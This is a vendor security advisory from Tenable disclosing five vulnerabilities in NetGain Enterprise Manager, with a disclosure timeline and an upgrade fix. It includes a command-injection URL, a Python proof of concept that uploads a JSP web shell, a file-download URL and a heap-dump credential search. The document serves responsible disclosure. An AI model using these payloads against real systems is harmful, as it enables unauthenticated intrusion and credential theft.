Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] NetGain Enterprise Manager Multiple Remote Vulnerabilities

High

Synopsis

While researching a command injection vulnerability published on Exploit Database, Tenable found multiple remote vulnerabilities in NetGain Enterprise Manager.

CVE-2017-16608: Incomplete Command Injection Patch

NetGain tried to patch the Exploit-DB command injection vulnerability in 7.2.586 build 877. The patch prevented the command injection by adding the following logic:

  1. The argument parameter must be a valid IP address
  2. The command must start with “cmd /c ping” or "ping –c 5"

The obvious problem is that an attacker can append additional information after the required command text. For instance, an attacker could make a new directory by using the command argument "cmd /c ping || mkdir C:\Users\Public\fun ||". The following URL is a complete example:

http://[target]:8081/u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping%20%7C%7C%20mkdir%20C%3A%5CUsers%5CPublic%5Cfun%20%7C%7C&argument=127.0.0.1&async_output=nessus_56043399

CVE-2017-16610: Unauthenticated JSP Upload and Execution

An unauthenticated remote attacker can upload arbitrary files to the remote server via an HTTP POST request to /u/jsp/backup/upload_save_do.jsp. This is particularly useful because NetGain EM has write access to the web root. Which means that an attacker can upload a JSP web shell. The following proof of concept uploads a web shell to the Javascript directory.

import requests
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder

if len(sys.argv) != 3:
    print 'Usage: ./nsg_backup_upload.py <server_address> <port>'
    print 'Example: python ./nsg_backup_upload.py 192.168.1.38 8081'
    sys.exit(0);

jsp_shell = (
    '<%@ page import=\"java.util.*,java.io.*\"%>\n'
    '<html><body>'
    '<form method=\"GET\" name=\"myform\" action=\"\">\n'
        '<input type=\"text\" name=\"cmd\">\n'
        '<input type=\"submit\" value=\"Send\">\n'
    '</form>\n'
    '<pre>\n'
    '<%\n'
        'if (request.getParameter(\"cmd\") != null) {\n'
            'out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<br>\");\n'
            'Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n'
            'OutputStream os = p.getOutputStream();\n'
            'InputStream in = p.getInputStream();\n'
            'DataInputStream dis = new DataInputStream(in);\n'
            'String disr = dis.readLine();\n'
            'while ( disr != null ) {\n'
                'out.println(disr);\n'
                'disr = dis.readLine();\n'
            '}\n'
        '}\n'
     '%>\n'
    '</pre></body></html>')


multipart_data = MultipartEncoder(
    fields =
    {
        'file': ('../u/js/shell.jsp', jsp_shell, 'text/plain')
    })

response = requests.post('http://' + sys.argv[1] + ':' + sys.argv[2] + '/u/jsp/backup/upload_save_do.jsp',
    data=multipart_data, headers={'Content-Type': multipart_data.content_type})

CVE-2017-16609: Unauthenticated File Download

An unauthenticated remote attacker can download any file on the remote server via an HTTP GET (or POST) request. The following URL will download C:\Windows\win.ini:

http://[target]:8081/u/jsp/common/download.jsp?filename=win.ini&srcDir=C:\Windows

CVE-2017-16607: Unauthenticated Information Disclosure

NetGain EM allows an unauthenticated remote attacker to download all of the process's heap memory using the following URL:

http://[target]:8081/u/jsp/settings/heapdumps.jsp?dumpnow=1

The attacker can then search the memory for interesting information such as credentials. For example, Tenable found the admin username and password in a dump using the following method:

albinolobster@ubuntu:~$ strings ./heapdump_2017_03_07_15_48_34.bin | grep username=
username=admin&password=thisismypassword%21

CVE-2017-17406: Unsafe Java Object Deserialization

NetGain EM exposes a couple of Java RMI Registries on ports 1800 and 1850. Also, NetGain uses a few Java libraries that are known to be useful in Java deserialization attacks including bsh, Apache Commons Collections, and Apache Commons FileUpload. Tenable confirmed an unauthenticated remote attacker could achieve remote code execution using a deserialization attack over RMI.

Solution

Upgrade to NetGain Enterprise Manager 7.2.766 or later.

Disclosure Timeline

2017-03-08 - Issues discovered
2017-03-17 - Issues submitted to ZDI
2017-04-11 - ZDI accepts vulnerabilities
2017-12-13 - ZDI releases advisories
2018-01-30 - Tenable releases advisory

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2018-02
Credit:
Jacob Baines
CVSSv2 Base / Temporal Score:
7.5 / 6.2
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:P/I:P/A:P)
Affected Products:
NetGain Enterprise Manager version less than 7.2.766
Risk Factor:
High
Additional Keywords:
ZDI-17-949
ZDI-17-950
ZDI-17-951
ZDI-17-952
ZDI-17-953

Advisory Timeline

2018-01-30 - [R1] Initial Release

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training